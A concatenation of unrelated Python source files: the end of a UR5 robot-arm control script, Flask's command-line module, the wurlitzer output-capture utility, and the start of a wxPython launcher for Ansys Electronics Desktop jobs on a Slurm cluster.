cur_click_count = self.click_count
action = self.action
target_position = self.target_position
grasp_angle = self.grasp_angle
if running:
running = not self.stop
if not block:
running = False
elif cur_click_count > prev_click_count:
running = False
if camera_color_img is None:
with self.mutex:
camera_color_img = self.camera_color_img
camera_depth_img = self.camera_depth_img
return action, target_position, grasp_angle, cur_click_count, camera_color_img, camera_depth_img
def __del__(self):
cv2.destroyAllWindows()
if __name__ == '__main__':
# User options (change me)
# --------------- Setup options ---------------
tcp_host_ip = '192.168.1.155' # IP and port to robot arm as TCP client (UR5)
tcp_port = 30002
rtc_host_ip = '192.168.1.155' # IP and port to robot arm as real-time client (UR5)
rtc_port = 30003
# action = 'touch'
action = 'grasp'
if action == 'touch':
# workspace_limits = np.asarray([[0.5, 0.75], [-0.3, 0.1], [0.17, 0.3]]) # Real Good Robot
workspace_limits = None
elif action == 'grasp':
workspace_limits = None
else:
raise NotImplementedError
is_sim = False
if is_sim:
tcp_port = 19997
calibrate = False
# Move robot to home pose
robot = Robot(is_sim, None, None, workspace_limits,
tcp_host_ip, tcp_port, rtc_host_ip, rtc_port,
False, None, None, place=True, calibrate=calibrate)
# if is_sim:
# robot.add_objects()
hcr = HumanControlOfRobot(robot, action=action)
hcr.run()
# while not hcr.stop:
# # hcr.run_one()
# hcr.get_action()
# cv2.destroyAllWindows()
|
cli.py
|
# -*- coding: utf-8 -*-
"""
flask.cli
~~~~~~~~~
A simple command line application to run flask apps.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
from threading import Lock, Thread
from functools import update_wrapper
import click
from ._compat import iteritems, reraise
from .helpers import get_debug_flag
from . import __version__
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in 'app', 'application':
app = getattr(module, attr_name, None)
if app is not None and isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for k, v in iteritems(module.__dict__)
if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
raise NoAppException('Failed to find application in module "%s". Are '
'you sure it contains a Flask application? Maybe '
'you wrapped it in a WSGI middleware or you are '
'using a factory function.' % module.__name__)
def prepare_exec_for_file(filename):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
module = []
# Chop off file extensions or package markers
if os.path.split(filename)[1] == '__init__.py':
filename = os.path.dirname(filename)
elif filename.endswith('.py'):
filename = filename[:-3]
else:
raise NoAppException('The file provided (%s) does exist but is not a '
'valid Python file. This means that it cannot '
'be used as application. Please change the '
'extension to .py' % filename)
filename = os.path.realpath(filename)
dirpath = filename
while 1:
dirpath, extra = os.path.split(dirpath)
module.append(extra)
if not os.path.isfile(os.path.join(dirpath, '__init__.py')):
break
sys.path.insert(0, dirpath)
return '.'.join(module[::-1])
def locate_app(app_id):
"""Attempts to locate the application."""
__traceback_hide__ = True
if ':' in app_id:
module, app_obj = app_id.split(':', 1)
else:
module = app_id
app_obj = None
try:
__import__(module)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[-1].tb_next:
raise
else:
raise NoAppException('The file/path provided (%s) does not appear'
' to exist. Please verify the path is '
'correct. If app is not on PYTHONPATH, '
'ensure the extension is .py' % module)
mod = sys.modules[module]
if app_obj is None:
app = find_best_app(mod)
else:
app = getattr(mod, app_obj, None)
if app is None:
raise RuntimeError('Failed to find application in module "%s"'
% module)
return app
def find_default_import_path():
app = os.environ.get('FLASK_APP')
if app is None:
return
if os.path.isfile(app):
return prepare_exec_for_file(app)
return app
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
message = 'Flask %(version)s\nPython %(python_version)s'
click.echo(message % {
'version': __version__,
'python_version': sys.version,
}, color=ctx.color)
ctx.exit()
version_option = click.Option(['--version'],
help='Show the flask version',
expose_value=False,
callback=get_version,
is_flag=True, is_eager=True)
class DispatchingApp(object):
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=False):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
reraise(*exc_info)
def _load_unlocked(self):
__traceback_hide__ = True
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo(object):
"""Help object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None):
if create_app is None:
if app_import_path is None:
app_import_path = find_default_import_path()
self.app_import_path = app_import_path
else:
app_import_path = None
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True
if self._loaded_app is not None:
return self._loaded_app
if self.create_app is not None:
rv = self.create_app(self)
else:
if not self.app_import_path:
raise NoAppException(
'Could not locate Flask application. You did not provide '
'the FLASK_APP environment variable.\n\nFor more '
'information see '
'http://flask.pocoo.org/docs/latest/quickstart/')
rv = locate_app(self.app_import_path)
debug = get_debug_flag()
if debug is not None:
rv.debug = debug
self._loaded_app = rv
return rv
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop('with_appcontext', True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault('cls', AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this.
For information as of why this is useful see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands wil be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info
and returns the loaded app.
"""
def __init__(self, add_default_commands=True, create_app=None,
add_version_option=True, **extra):
params = list(extra.pop('params', None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points('flask.commands'):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
self._load_plugin_commands()
# The commands available is the list of both the application (if
# available) plus the builtin commands.
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
pass
return sorted(rv)
def main(self, *args, **kwargs):
obj = kwargs.get('obj')
if obj is None:
obj = ScriptInfo(create_app=self.create_app)
kwargs['obj'] = obj
kwargs.setdefault('auto_envvar_prefix', 'FLASK')
return AppGroup.main(self, *args, **kwargs)
@click.command('run', short_help='Runs a development server.')
@click.option('--host', '-h', default='127.0.0.1',
help='The interface to bind to.')
@click.option('--port', '-p', default=5000,
help='The port to bind to.')
@click.option('--reload/--no-reload', default=None,
help='Enable or disable the reloader. By default the reloader '
'is active if debug is enabled.')
@click.option('--debugger/--no-debugger', default=None,
help='Enable or disable the debugger. By default the debugger '
'is active if debug is enabled.')
@click.option('--eager-loading/--lazy-loader', default=None,
help='Enable or disable eager loading. By default eager '
'loading is enabled if the reloader is disabled.')
@click.option('--with-threads/--without-threads', default=False,
help='Enable or disable multithreading.')
@pass_script_info
def run_command(info, host, port, reload, debugger, eager_loading,
with_threads):
"""Runs a local development server for the Flask application.
This local server is recommended for development purposes only but it
can also be used for simple intranet deployments. By default it will
not support any sort of concurrency at all to simplify debugging. This
can be changed with the --with-threads option which will enable basic
multithreading.
The reloader and debugger are by default enabled if the debug flag of
Flask is enabled and disabled otherwise.
"""
from werkzeug.serving import run_simple
debug = get_debug_flag()
if reload is None:
reload = bool(debug)
if debugger is None:
debugger = bool(debug)
if eager_loading is None:
eager_loading = not reload
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
# Extra startup messages. This depends a bit on Werkzeug internals to
# not double execute when the reloader kicks in.
if os.environ.get('WERKZEUG_RUN_MAIN') != 'true':
# If we have an import path we can print it out now which can help
# people understand what's being served. If we do not have an
# import path because the app was loaded through a callback then
# we won't print anything.
if info.app_import_path is not None:
print(' * Serving Flask app "%s"' % info.app_import_path)
if debug is not None:
print(' * Forcing debug mode %s' % (debug and 'on' or 'off'))
run_simple(host, port, app, use_reloader=reload,
use_debugger=debugger, threaded=with_threads)
@click.command('shell', short_help='Runs a shell in the app context.')
@with_appcontext
def shell_command():
"""Runs an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to it's configuration.
This is useful for executing small snippets of management code
without having to manually configuring the application.
"""
import code
from flask.globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = 'Python %s on %s\nApp: %s%s\nInstance: %s' % (
sys.version,
sys.platform,
app.import_name,
app.debug and ' [debug]' or '',
app.instance_path,
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get('PYTHONSTARTUP')
if startup and os.path.isfile(startup):
with open(startup, 'r') as f:
eval(compile(f.read(), startup, 'exec'), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
cli = FlaskGroup(help="""\
This shell command acts as general utility script for Flask applications.
It loads the application configured (through the FLASK_APP environment
variable) and then provides commands either provided by the application or
Flask itself.
The most useful commands are the "run" and "shell" command.
Example usage:
\b
%(prefix)s%(cmd)s FLASK_APP=hello.py
%(prefix)s%(cmd)s FLASK_DEBUG=1
%(prefix)sflask run
""" % {
'cmd': os.name == 'posix' and 'export' or 'set',
'prefix': os.name == 'posix' and '$ ' or '',
})
def main(as_module=False):
this_module = __package__ + '.cli'
args = sys.argv[1:]
if as_module:
if sys.version_info >= (2, 7):
name = 'python -m ' + this_module.rsplit('.', 1)[0]
else:
name = 'python -m ' + this_module
# This module is always executed as "python -m flask.run" and as such
# we need to ensure that we restore the actual command line so that
# the reloader can properly operate.
sys.argv = ['-m', this_module] + sys.argv[1:]
else:
name = None
cli.main(args=args, prog_name=name)
if __name__ == '__main__':
main(as_module=True)
|
wurlitzer.py
|
"""Capture C-level FD output on pipes
Use `wurlitzer.pipes` or `wurlitzer.sys_pipes` as context managers.
"""
from __future__ import print_function
__version__ = '0.2.1.dev'
__all__ = [
'Wurlitzer',
]
from contextlib import contextmanager
import ctypes
from fcntl import fcntl, F_GETFL, F_SETFL
import io
import os
import select
import sys
import threading
libc = ctypes.CDLL(None)
try:
c_stdout_p = ctypes.c_void_p.in_dll(libc, 'stdout')
c_stderr_p = ctypes.c_void_p.in_dll(libc, 'stderr')
except ValueError: # pragma: no cover
# libc.stdout is has a funny name on OS X
c_stdout_p = ctypes.c_void_p.in_dll(libc, '__stdoutp') # pragma: no cover
c_stderr_p = ctypes.c_void_p.in_dll(libc, '__stderrp') # pragma: no cover
STDOUT = 2
PIPE = 3
_default_encoding = getattr(sys.stdin, 'encoding', None) or 'utf8'
if _default_encoding.lower() == 'ascii':
# don't respect ascii
_default_encoding = 'utf8' # pragma: no cover
class Wurlitzer(object):
"""Class for Capturing Process-level FD output via dup2
Typically used via `wurlitzer.capture`
"""
flush_interval = 0.2
def __init__(self, stdout=None, stderr=None, encoding=_default_encoding):
"""
Parameters
----------
stdout: stream or None
The stream for forwarding stdout.
stderr = stream or None
The stream for forwarding stderr.
encoding: str or None
The encoding to use, if streams should be interpreted as text.
"""
self._stdout = stdout
if stderr == STDOUT:
self._stderr = self._stdout
else:
self._stderr = stderr
self.encoding = encoding
self._save_fds = {}
self._real_fds = {}
self._handlers = {}
self._handlers['stderr'] = self._handle_stderr
self._handlers['stdout'] = self._handle_stdout
def _setup_pipe(self, name):
real_fd = getattr(sys, '__%s__' % name).fileno()
save_fd = os.dup(real_fd)
self._save_fds[name] = save_fd
pipe_out, pipe_in = os.pipe()
os.dup2(pipe_in, real_fd)
os.close(pipe_in)
self._real_fds[name] = real_fd
# make pipe_out non-blocking
flags = fcntl(pipe_out, F_GETFL)
fcntl(pipe_out, F_SETFL, flags|os.O_NONBLOCK)
return pipe_out
def _decode(self, data):
"""Decode data, if any
Called before pasing to stdout/stderr streams
"""
if self.encoding:
data = data.decode(self.encoding, 'replace')
return data
def _handle_stdout(self, data):
if self._stdout:
self._stdout.write(self._decode(data))
def _handle_stderr(self, data):
if self._stderr:
self._stderr.write(self._decode(data))
def _setup_handle(self):
"""Setup handle for output, if any"""
self.handle = (self._stdout, self._stderr)
def _finish_handle(self):
"""Finish handle, if anything should be done when it's all wrapped up."""
pass
def __enter__(self):
# flush anything out before starting
libc.fflush(c_stdout_p)
libc.fflush(c_stderr_p)
# setup handle
self._setup_handle()
# create pipe for stdout
pipes = []
names = {}
if self._stdout:
pipe = self._setup_pipe('stdout')
pipes.append(pipe)
names[pipe] = 'stdout'
if self._stderr:
pipe = self._setup_pipe('stderr')
pipes.append(pipe)
names[pipe] = 'stderr'
def forwarder():
"""Forward bytes on a pipe to stream messages"""
while True:
# flush libc's buffers before calling select
# See Calysto/metakernel#5: flushing sometimes blocks.
# libc.fflush(c_stdout_p)
# libc.fflush(c_stderr_p)
r, w, x = select.select(pipes, [], [], self.flush_interval)
if not r:
# nothing to read, next iteration will flush and check again
continue
for pipe in r:
name = names[pipe]
data = os.read(pipe, 1024)
if not data:
# pipe closed, stop polling
pipes.remove(pipe)
else:
handler = getattr(self, '_handle_%s' % name)
handler(data)
if not pipes:
# pipes closed, we are done
break
self.thread = threading.Thread(target=forwarder)
self.thread.daemon = True
self.thread.start()
return self.handle
def __exit__(self, exc_type, exc_value, traceback):
# flush the underlying C buffers
libc.fflush(c_stdout_p)
libc.fflush(c_stderr_p)
# close FDs, signaling output is complete
for real_fd in self._real_fds.values():
os.close(real_fd)
self.thread.join()
# restore original state
for name, real_fd in self._real_fds.items():
save_fd = self._save_fds[name]
os.dup2(save_fd, real_fd)
os.close(save_fd)
# finalize handle
self._finish_handle()
|
run_gui.py
|
"""
IMPORTANT usage note:
place slurm_settings.areg at the same folder where script is located
modify cluster_configuration.json according to cluster configuration
and builds available
"""
import argparse
import errno
import getpass
import json
import os
import re
import shutil
import signal
import socket
import subprocess
import sys
import threading
import time
from collections import OrderedDict
from datetime import datetime
import requests
import wx
import wx._core
import wx.dataview
from influxdb import InfluxDBClient
from wx.lib.wordwrap import wordwrap
from gui.src_gui import GUIFrame
__authors__ = "Maksim Beliaev, Leon Voss"
__version__ = "v3.2.3"
STATISTICS_SERVER = "OTTBLD02"
STATISTICS_PORT = 8086
FIREFOX = "/bin/firefox" # path to installation of firefox for Overwatch
# read cluster configuration from a file
cluster_configuration_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), "cluster_configuration.json")
try:
with open(cluster_configuration_file) as config_file:
cluster_config = json.load(config_file, object_pairs_hook=OrderedDict)
except FileNotFoundError:
print("\nConfiguration file does not exist!\nCheck existence of " + cluster_configuration_file)
sys.exit()
except json.decoder.JSONDecodeError:
print(
"\nConfiguration file is wrong!\nCheck format of {} \nOnly double quotes are allowed!".format(
cluster_configuration_file
)
)
sys.exit()
try:
path_to_ssh = cluster_config["path_to_ssh"]
overwatch_url = cluster_config["overwatch_url"]
overwatch_api_url = cluster_config["overwatch_api_url"]
# dictionary for the versions
default_version = cluster_config["default_version"]
install_dir = cluster_config["install_dir"]
# define queue dependent number of cores and RAM per node (interactive mode)
queue_config_dict = cluster_config["queue_config_dict"]
# dictionary in which we will pop up dynamically information about the load from the OverWatch
# this dictionary also serves to define parallel environments for each queue
default_queue = cluster_config["default_queue"]
project_path = cluster_config["user_project_path_root"]
admin_env_vars = cluster_config.pop("environment_vars", None)
except KeyError as key_e:
print(
(
"\nConfiguration file is wrong!\nCheck format of {} \nOnly double quotes are allowed."
+ "\nFollowing key does not exist: {}"
).format(cluster_configuration_file, key_e.args[0])
)
sys.exit()
parser = argparse.ArgumentParser()
parser.add_argument("--debug", help="Debug mode", action="store_true")
cli_args = parser.parse_args()
DEBUG_MODE = cli_args.debug
# create keys for usage statistics that would be updated later
queue_dict = {name: {} for name in queue_config_dict}
for queue_val in queue_dict.values():
queue_val["total_cores"] = 100
queue_val["avail_cores"] = 0
queue_val["used_cores"] = 100
queue_val["reserved_cores"] = 0
queue_val["failed_cores"] = 0
# list to keep information about running jobs
qstat_list = []
log_dict = {"pid": "0", "msg": "None", "scheduler": False}
class ClearMsgPopupMenu(wx.Menu):
def __init__(self, parent):
super(ClearMsgPopupMenu, self).__init__()
self.parent = parent
mmi = wx.MenuItem(self, wx.NewId(), "Clear All Messages")
self.Append(mmi)
self.Bind(wx.EVT_MENU, self.on_clear, mmi)
def on_clear(self, *args):
self.parent.scheduler_msg_viewlist.DeleteAllItems()
self.parent.log_data = {"Message List": [], "PID List": [], "GUI Data": []}
if os.path.isfile(self.parent.logfile):
os.remove(self.parent.logfile)
# create a new event to bind it and call it from subthread. UI should be changed ONLY in MAIN THREAD
# signal - cluster load
my_SIGNAL_EVT = wx.NewEventType()
SIGNAL_EVT = wx.PyEventBinder(my_SIGNAL_EVT, 1)
# signal - qstat
NEW_SIGNAL_EVT_QSTAT = wx.NewEventType()
SIGNAL_EVT_QSTAT = wx.PyEventBinder(NEW_SIGNAL_EVT_QSTAT, 1)
# signal - log message
NEW_SIGNAL_EVT_LOG = wx.NewEventType()
SIGNAL_EVT_LOG = wx.PyEventBinder(NEW_SIGNAL_EVT_LOG, 1)
# signal - status bar
NEW_SIGNAL_EVT_BAR = wx.NewEventType()
SIGNAL_EVT_BAR = wx.PyEventBinder(NEW_SIGNAL_EVT_BAR, 1)
class SignalEvent(wx.PyCommandEvent):
"""Event to signal that we are ready to update the plot"""
def __init__(self, etype, eid):
"""Creates the event object"""
wx.PyCommandEvent.__init__(self, etype, eid)
class ClusterLoadUpdateThread(threading.Thread):
def __init__(self, parent):
"""
@param parent: The gui object that should receive the value
"""
threading.Thread.__init__(self)
self._parent = parent
def run(self):
"""Overrides Thread.run.
Don't call this directly its called internally when you call
Thread.start().
Gets cluster load every 60 seconds. 0.5s step is used to be
able to stop subthread earlier by triggering parent.running
Update a list of jobs status for a user every 5s
"""
counter = 120
while self._parent.running:
if counter % 120 == 0:
try:
self.parse_cluster_load()
except (requests.exceptions.BaseHTTPError, requests.exceptions.RequestException):
print("Cannot reach OverWatch server")
except KeyError:
print("Cannot parse OverWatch data. Probably Service is down.")
counter = 0
if counter % 10 == 0:
self.parse_user_jobs()
time.sleep(0.5)
counter += 1
def parse_user_jobs(self):
qstat_list.clear()
slurm_stat_output = subprocess.check_output(self._parent.squeue, shell=True)
slurm_stat_output = slurm_stat_output.decode("ascii", errors="ignore")
exclude = cluster_config["vnc_nodes"] + cluster_config["dcv_nodes"]
for i, line in enumerate(slurm_stat_output.split("\n")[1:]):
pid = line[0:18].strip()
# partition = line[19:28].strip()
job_name = line[29:38].strip()
user = line[38:47].strip()
state = line[48:49].strip()
num_cpu = line[50:54].strip()
started = line[54:75].strip()
node_list = line[76:].strip()
for node in exclude:
if node in node_list:
break
else:
# it is neither VNC nor DCV job
qstat_list.append(
{
"pid": pid,
"state": state,
"name": job_name,
"user": user,
"queue_data": node_list,
"proc": num_cpu,
"started": started,
}
)
evt = SignalEvent(NEW_SIGNAL_EVT_QSTAT, -1)
wx.PostEvent(self._parent, evt)
# get message texts
for pid in self._parent.log_data["PID List"]:
o_file = os.path.join(self._parent.user_dir, "ansysedt.o" + pid)
if os.path.exists(o_file):
output_text = ""
with open(o_file, "r") as file:
for msgline in file:
output_text += msgline
if output_text != "":
log_dict["pid"] = pid
log_dict["msg"] = "Submit Message: " + output_text
log_dict["scheduler"] = True
evt = SignalEvent(NEW_SIGNAL_EVT_LOG, -1)
wx.PostEvent(self._parent, evt)
os.remove(o_file)
e_file = os.path.join(self._parent.user_dir, "ansysedt.e" + pid)
if os.path.exists(e_file):
error_text = ""
with open(e_file, "r") as file:
for msgline in file:
error_text += msgline
if error_text != "":
log_dict["pid"] = pid
log_dict["msg"] = "Submit Error: " + error_text
log_dict["scheduler"] = True
evt = SignalEvent(NEW_SIGNAL_EVT_LOG, -1)
wx.PostEvent(self._parent, evt)
os.remove(e_file)
def parse_cluster_load(self):
"""Parse data from Overwatch and generates dictionary with cluster load for each queue."""
# with requests.get(overwatch_url, params={"cluster": "ott"}) as url_req: # could be used with params
with requests.get(f"{overwatch_api_url}/api/v1/overwatch/minclusterstatus") as url_req:
cluster_data = url_req.json()
for queue_elem in cluster_data["QueueStatus"]:
queue_name = queue_elem["name"]
if queue_name in queue_dict:
queue_dict[queue_name]["total_cores"] = queue_elem["totalSlots"]
queue_dict[queue_name]["used_cores"] = queue_elem["totalUsedSlots"]
queue_dict[queue_name]["failed_cores"] = queue_elem["totalUnavailableSlots"]
queue_dict[queue_name]["reserved_cores"] = queue_elem["totalReservedSlots"]
queue_dict[queue_name]["avail_cores"] = queue_elem["totalAvailableSlots"]
evt = SignalEvent(my_SIGNAL_EVT, -1)
wx.PostEvent(self._parent, evt)
class FlashStatusBarThread(threading.Thread):
def __init__(self, parent):
"""
@param parent: The gui object that should receive the value
"""
threading.Thread.__init__(self)
self._parent = parent
def run(self):
"""Overrides Thread.run. Don't call this directly its called internally
when you call Thread.start().
alternates the color of the status bar for run_sec (6s) to take attention
at the end clears the status message
"""
if self._parent.bar_level == "i":
alternating_color = wx.GREEN
elif self._parent.bar_level == "!":
alternating_color = wx.RED
run_sec = 6
for i in range(run_sec * 2):
self._parent.bar_color = wx.WHITE if i % 2 == 0 else alternating_color
if i == run_sec * 2 - 1:
self._parent.bar_text = "No Status Message"
self._parent.bar_color = wx.WHITE
evt = SignalEvent(NEW_SIGNAL_EVT_BAR, -1)
wx.PostEvent(self._parent, evt)
time.sleep(0.5)
class LauncherWindow(GUIFrame):
def __init__(self, parent):
global default_queue
# Initialize the main form
GUIFrame.__init__(self, parent)
GUIFrame.SetTitle(self, f"Ansys Electronics Desktop Launcher {__version__}")
# Get environment data
self.user_dir = os.path.expanduser("~")
self.app_dir = self.ensure_app_folder()
self.username = getpass.getuser()
self.hostname = socket.gethostname()
self.display_node = os.getenv("DISPLAY")
self.squeue = 'squeue --me --format "%.18i %.9P %.8j %.8u %.2t %.4C %.20V %R"'
# get paths
self.user_build_json = os.path.join(self.app_dir, "user_build.json")
self.default_settings_json = os.path.join(self.app_dir, "default.json")
self.builds_data = {}
self.default_settings = {}
# generate list of products for registry
self.products = {}
for key in list(install_dir.keys()):
try:
with open(os.path.join(install_dir[key], "config", "ProductList.txt")) as file:
self.products[key] = next(file).rstrip() # get first line
except FileNotFoundError:
print(f"Installation is corrupted {install_dir[key]}")
install_dir.pop(key)
# set default project path
self.path_textbox.Value = os.path.join(project_path, self.username)
self.display_node = self.check_display_var()
# check if we are on VNC or DCV node
viz_type = None
for node in cluster_config["vnc_nodes"]:
if node in self.display_node:
viz_type = "VNC"
break
else:
for node in cluster_config["dcv_nodes"]:
if node in self.display_node:
viz_type = "DCV"
break
msg = "No Status Message"
if viz_type is None:
add_message(
message=(
"Display Type is unknown: cannot identify VNC/DCV. "
"Interactive Submission might fail.\n"
"Contact cluster administrator."
),
title="Display Type Error",
icon="!",
)
msg = "Warning: Unknown Display Type!!"
viz_type = ""
# Set the status bars on the bottom of the window
self.m_status_bar.SetStatusText(f"User: {self.username} on {viz_type} node {self.display_node}", 0)
self.m_status_bar.SetStatusText(msg, 1)
self.m_status_bar.SetStatusWidths([500, -1])
init_combobox(install_dir.keys(), self.m_select_version1, default_version)
# Setup Process Log
self.scheduler_msg_viewlist.AppendTextColumn("Timestamp", width=140)
self.scheduler_msg_viewlist.AppendTextColumn("PID", width=75)
self.scheduler_msg_viewlist.AppendTextColumn("Message")
self.logfile = os.path.join(self.app_dir, "user_log_" + viz_type + ".json")
# read in previous log file
self.log_data = {"Message List": [], "PID List": [], "GUI Data": []}
if os.path.exists(self.logfile):
try:
with open(self.logfile, "r") as file:
self.log_data = json.load(file)
self.update_msg_list()
except json.decoder.JSONDecodeError:
print("Error reading log file")
os.remove(self.logfile)
# initialize the table with User Defined Builds
self.user_build_viewlist.AppendTextColumn("Build Name", width=150)
self.user_build_viewlist.AppendTextColumn("Build Path", width=640)
self.set_user_jobs_viewlist()
self.set_cluster_load_table()
# Disable Pre-Post/Interactive radio button in case of DCV
if viz_type == "DCV":
self.submit_mode_radiobox.EnableItem(3, False)
self.submit_mode_radiobox.SetSelection(0)
else:
self.submit_mode_radiobox.EnableItem(3, True)
self.submit_mode_radiobox.Select(3)
self.m_notebook2.ChangeSelection(0)
self.read_custom_builds()
# populate UI with default or pre-saved settings
if os.path.isfile(self.default_settings_json):
try:
self.settings_load()
default_queue = self.default_settings["queue"]
except KeyError:
add_message("Settings file was corrupted", "Settings file", "!")
init_combobox(queue_dict.keys(), self.queue_dropmenu, default_queue)
self.select_queue()
self.evt_node_list_check()
self.on_reserve_check()
# run in parallel to UI regular update of chart and process list
self.running = True
# bind custom event to invoke function on_signal
self.Bind(SIGNAL_EVT, self.on_signal)
self.Bind(SIGNAL_EVT_QSTAT, self.update_job_status)
self.Bind(SIGNAL_EVT_LOG, self.add_log_entry)
self.Bind(SIGNAL_EVT_BAR, self.set_status_bar)
# start a thread to update cluster load
worker = ClusterLoadUpdateThread(self)
worker.start()
self.m_nodes_list.Show(True) # required for proper rendering
# after UI is loaded run select_mode to process UI correctly, otherwise UI is shifted since sizers do not
# reserve space for hidden objects
wx.CallAfter(self.select_mode)
def set_user_jobs_viewlist(self):
"""Setup Process ViewList"""
self.qstat_viewlist.AppendTextColumn("PID", width=70)
self.qstat_viewlist.AppendTextColumn("State", width=50)
self.qstat_viewlist.AppendTextColumn("Name", width=80)
self.qstat_viewlist.AppendTextColumn("User", width=70)
self.qstat_viewlist.AppendTextColumn("Queue", width=200)
self.qstat_viewlist.AppendTextColumn("cpu", width=40)
self.qstat_viewlist.AppendTextColumn("Started", width=50)
def set_cluster_load_table(self):
"""setup cluster load table"""
self.load_grid.SetColLabelValue(0, "Available")
self.load_grid.SetColSize(0, 80)
self.load_grid.SetColLabelValue(1, "Used")
self.load_grid.SetColSize(1, 80)
self.load_grid.SetColLabelValue(2, "Reserved")
self.load_grid.SetColSize(2, 80)
self.load_grid.SetColLabelValue(3, "Failed")
self.load_grid.SetColSize(3, 80)
self.load_grid.SetColLabelValue(4, "Total")
self.load_grid.SetColSize(4, 80)
for i, queue_key in enumerate(queue_dict):
self.load_grid.AppendRows(1)
self.load_grid.SetRowLabelValue(i, queue_key)
# colors
self.load_grid.SetCellBackgroundColour(i, 0, "light green")
self.load_grid.SetCellBackgroundColour(i, 1, "red")
self.load_grid.SetCellBackgroundColour(i, 2, "light grey")
def set_status_bar(self, _unused_event=None):
self.m_status_bar.SetStatusText(self.bar_text, 1)
self.m_status_bar.SetBackgroundColour(self.bar_color)
self.m_status_bar.Refresh()
def add_status_msg(self, msg="", level="i"):
"""
Function that creates a thread to add a status bar message with alternating color to take attention of the user
:param msg: str, message text
:param level: either "i" as information for green color or "!" as error for red color
:return: None
"""
self.bar_text = msg
